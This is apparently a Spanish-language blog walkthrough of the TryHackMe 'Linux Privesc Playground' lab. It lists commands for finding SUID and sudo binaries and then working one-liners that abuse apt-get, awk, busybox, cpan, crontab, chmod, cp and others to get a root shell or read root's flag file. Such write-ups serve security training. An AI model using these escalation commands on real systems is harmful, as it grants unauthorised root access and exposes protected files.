This page looks best with JavaScript enabled

TryHackMe - Linux Privesc Playground

 •  ✍️ sckull

Linux Privesc Playground es una maquina de TryHackMe que presenta distintos ficheros SUID para practicar escalar privilegios en Linux.

Room

Titulo Linux Privesc Playground box_img_maker
Descripción A linux privilege escalation playground, filled with badly configured superuser permissions, incorrectly set SUID bits, and more!
Puntos *
Dificultad Facil
Maker

SherlockSec

Linux Privesc Playground, contiene ficheros del tipo SUID los cuales al ejecutarlos, se obtiene permisos del usuario quien creo este fichero unicamente durante la ejecucion.

Las credenciales de la maquina:

1
user:password

image

Para poder enumerar los ficheros del tipo SUID podemos utilizar los siguientes comandos:

1
2
3
find / -perm -4000 2> /dev/null | xargs ls -lah

find / -perm -u=s -type f 2>/dev/null

De igual forma podemos utilizar sudo para poder ver que ficheros pueden ser ejecutados bajo el comando sudo.

1
sudo -l -l

Podemos ver que nos devuelve una lista de ficheros los cuales pueden ser utilizados para obtener privilegios de root.

A continuacion se listan la solucion para alguno de ellos, se puede encontrar los comandos en la pagina GTFOBINS.

/bin/apt-get*

En el caso de este fichero al consultar sobre la existencia en el directorio que nos muestra el listado no existe en esa direccion. Utilizamos cp para copiar el acrhivo y lo colocamos en la direccion /bin/.

Comando:

1
sudo /bin/apt-get update -o APT::Update::Pre-Invoke::= /bin/bash

image

/usr/bin/aria2c

Ya que podemos ejecutar este archivo con el comando sudo, podemos aprovechar las diferentes opciones que tiene el archivo. aria2c en su version 1.13.0.

Comando:

1
sudo /usr/bin/aria2c -i /root/flag.txt

image

/usr/sbin/arp

Comando:

1
LFILE=/root/flag.txt; sudo arp -v -f "$LFILE"

image

/bin/ash

Comando:

1
sudo /bin/ash

image

/usr/bin/awk

Comando:

1
sudo awk 'BEGIN {system("/bin/sh")}'

image

/usr/bin/base64

Comando:

1
2
LFILE=/root/flag.txt
sudo base64 "$LFILE" | base64 --decode

image

/bin/bash

Comando:

1
sudo bash

image

/bin/busybox

Comando:

1
sudo busybox sh

image

/bin/cat

Comando:

1
sudo /bin/cat /root/flag.txt

image

/bin/chmod

Comando:

1
2
LFILE=/root/flag.txt
sudo chmod 0777 $LFILE

image

/bin/chown

Comando:

1
2
LFILE=/root/flag.txt
sudo /bin/chown $(id -un):$(id -gn) $LFILE

image

/bin/cp

Comando:

1
2
3
4
FLAG=/tmp/flag.txt
TF=/root/flag.txt
sudo /bin/cp $TF $FLAG
cat $FLAG

image

/usr/bin/cpan

Comando:

1
sudo cpan

Elegimos no a las opciones hasta CPAN site, entonces ‘Autoconfiguration complete.’ y escribimos el siguiente comando:

1
! exec '/bin/bash'

image

/bin/crontab

Comando:

1
sudo /bin/crontab -e

Seleccionamos el editor Vim, presionamos ESC y escribimos :!sh.

image

/usr/bin/cut

Comando:

1
2
LFILE=/root/flag.txt
sudo cut -d "" -f1 "$LFILE"

image

Share on

Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe